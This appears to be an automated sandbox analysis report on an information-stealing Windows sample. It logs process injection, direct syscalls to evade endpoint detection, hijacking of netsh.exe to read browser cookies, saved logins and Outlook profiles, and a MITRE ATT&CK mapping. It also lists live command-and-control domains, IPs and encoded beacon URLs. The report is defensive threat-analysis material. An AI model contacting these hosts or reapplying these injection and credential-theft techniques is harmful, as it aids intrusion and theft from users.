            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeNtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeMemory written: C:\Users\user\Desktop\yZcecBUXN7.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeSection loaded: NULL target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: read write
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3020
            Source: C:\Windows\SysWOW64\netsh.exeThread APC queued: target process: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeProcess created: C:\Users\user\Desktop\yZcecBUXN7.exe "C:\Users\user\Desktop\yZcecBUXN7.exe"
            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
            Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: yZcecBUXN7.exeBinary or memory string: Progman
            Source: yZcecBUXN7.exeBinary or memory string: IsProgmanWindow
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1812801451.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123522190.0000000001260000.00000002.00000001.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972554531.00000000016F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: yZcecBUXN7.exeBinary or memory string: CommentsWindows Progman Group ConverterL
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeQueries volume information: C:\Users\user\Desktop\yZcecBUXN7.exe VolumeInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

            Stealing of Sensitive Information

            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netsh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            MITRE ATT&CK Matrix, listed per tactic column; a leading number is the badge shown beside that technique on the page.

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
            Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
            Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 412 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
            Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 41 Obfuscated Files or Information; 2 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 File Deletion; 1 Masquerading; 51 Virtualization/Sandbox Evasion; 412 Process Injection
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
            Discovery: 2 File and Directory Discovery; 13 System Information Discovery; 21 Security Software Discovery; 2 Process Discovery; 51 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
            Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
            Command and Control: 3 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1435169 Sample: yZcecBUXN7.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100

            • Start. DNS/IP: www.yamiyasheec.online; www.vavada-band.ru; 19 other IPs or domains. Signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures
              • yZcecBUXN7.exe (started). Signature: Injects a PE file into a foreign processes
                • yZcecBUXN7.exe (started). Signature: Maps a DLL or memory area into another process
                  • jBaxmaKIzqHZYEOPQcTTJTXx.exe (injected). Signature: Found direct / indirect Syscall (likely to bypass EDR)
                    • netsh.exe (started). Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Deletes itself after installation; 3 other signatures
                      • jBaxmaKIzqHZYEOPQcTTJTXx.exe (injected). DNS/IP: www.quantummquest.top 203.161.50.127, 49754, 49755, 49756 VNPT-AS-VNVNPTCorpVN Malaysia; www.whirledairlines.com 216.40.34.41, 49750, 49751, 49752 TUCOWSCA Canada; 10 other IPs or domains. Signature: Found direct / indirect Syscall (likely to bypass EDR)
                      • firefox.exe (started)

            Source | Detection | Scanner | Label
            yZcecBUXN7.exe | 29% | ReversingLabs |
            yZcecBUXN7.exe | 38% | Virustotal |
            yZcecBUXN7.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            vavada-band.ru | 4% | Virustotal |
            www.dhleba51.ru | 2% | Virustotal |
            applesolve.com | 1% | Virustotal |
            www.bettaroom.ru | 3% | Virustotal |
            dainikmirpur.com | 0% | Virustotal |
            www.applesolve.com | 1% | Virustotal |
            www.dainikmirpur.com | 0% | Virustotal |
            bnbuotqakx.shop | 5% | Virustotal |
            www.vavada-band.ru | 7% | Virustotal |
            www.vaesen.net | 1% | Virustotal |
            Source | Detection | Scanner | Label
            http://www.dhleba51.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM= | 100% | Avira URL Cloud | malware
            http://www.yamiyasheec.online/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg= | 0% | Avira URL Cloud | safe
            http://www.whirledairlines.com/0hhg/ | 0% | Avira URL Cloud | safe
            http://www.applesolve.com/0hhg/ | 0% | Avira URL Cloud | safe
            http://www.applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ | 0% | Avira URL Cloud | safe
            http://www.whirledairlines.com/0hhg/ | 0% | Virustotal |
            http://www.applesolve.com/0hhg/ | 2% | Virustotal |
            http://www.dk48.lol/0hhg/ | 0% | Avira URL Cloud | safe
            http://www.dk48.lol/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc= | 0% | Avira URL Cloud | safe
            http://www.xxaiai.top/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo= | 0% | Avira URL Cloud | safe
            http://www.bnbuotqakx.shop/0hhg/ | 100% | Avira URL Cloud | malware
            http://www.whirledairlines.com/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4= | 0% | Avira URL Cloud | safe
            http://applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX | 0% | Avira URL Cloud | safe
            https://www.cucuzeus88.store/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC | 0% | Avira URL Cloud | safe
            http://www.quantummquest.top/0hhg/ | 0% | Avira URL Cloud | safe
            http://www.quantummquest.top/0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJ | 0% | Avira URL Cloud | safe
            http://www.dainikmirpur.com/0hhg/ | 0% | Avira URL Cloud | safe
            http://www.yamiyasheec.online/0hhg/ | 0% | Avira URL Cloud | safe
            http://www.dhleba51.ru/0hhg/ | 100% | Avira URL Cloud | malware
            http://www.xxaiai.top/0hhg/ | 0% | Avira URL Cloud | safe
            http://www.dainikmirpur.com/0hhg/ | 0% | Virustotal |
            http://www.quantummquest.top/0hhg/ | 1% | Virustotal |
            http://www.dainikmirpur.com/0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ | 0% | Avira URL Cloud | safe
            http://www.yamiyasheec.online/0hhg/ | 3% | Virustotal |
            http://www.vavada-band.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= | 100% | Avira URL Cloud | malware
            http://www.bnbuotqakx.shop | 100% | Avira URL Cloud | malware
            http://www.bettaroom.ru/0hhg/ | 0% | Avira URL Cloud | safe
            http://www.dhleba51.ru/0hhg/ | 4% | Virustotal |
            http://www.cucuzeus88.store/0hhg/ | 0% | Avira URL Cloud | safe
            http://www.bettaroom.ru/0hhg/ | 8% | Virustotal |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            vavada-band.ru | 148.251.36.121 | true | false | | unknown
            cucuzeus88.store | 153.92.8.41 | true | false | | unknown
            www.quantummquest.top | 203.161.50.127 | true | false | | unknown
            www.dhleba51.ru | 195.24.68.5 | true | false | | unknown
            applesolve.com | 188.116.38.155 | true | false | | unknown
            parkingpage.namecheap.com | 91.195.240.19 | true | false | | high
            www.bettaroom.ru | 194.58.112.173 | true | false | | unknown
            bnbuotqakx.shop | 101.99.93.157 | true | false | | unknown
            www.xxaiai.top | 108.186.8.158 | true | false | | unknown
            dainikmirpur.com | 192.250.235.36 | true | false | | unknown
            www.whirledairlines.com | 216.40.34.41 | true | false | | unknown
            yamiyasheec.online | 119.18.54.116 | true | false | | unknown
            www.applesolve.com | unknown | unknown | true | | unknown
            www.cucuzeus88.store | unknown | unknown | true | | unknown
            www.bnbuotqakx.shop | unknown | unknown | true | | unknown
            www.dainikmirpur.com | unknown | unknown | true | | unknown
            www.dk48.lol | unknown | unknown | true | | unknown
            www.cluird.cloud | unknown | unknown | true | | unknown
            www.yamiyasheec.online | unknown | unknown | true | | unknown
            www.vavada-band.ru | unknown | unknown | true | | unknown
            www.vaesen.net | unknown | unknown | true | | unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.whirledairlines.com/0hhg/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.yamiyasheec.online/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg=false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.dhleba51.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM=false
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.applesolve.com/0hhg/false
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.dk48.lol/0hhg/false
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.dk48.lol/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc=false
                                  • Avira URL Cloud: safe
                                  unknown
http://www.xxaiai.top/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo= | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.bnbuotqakx.shop/0hhg/ | Malicious: false | Avira URL Cloud: malware | Reputation: unknown
http://www.whirledairlines.com/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4= | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.quantummquest.top/0hhg/ | Malicious: false | Virustotal: 1% | Avira URL Cloud: safe | Reputation: unknown
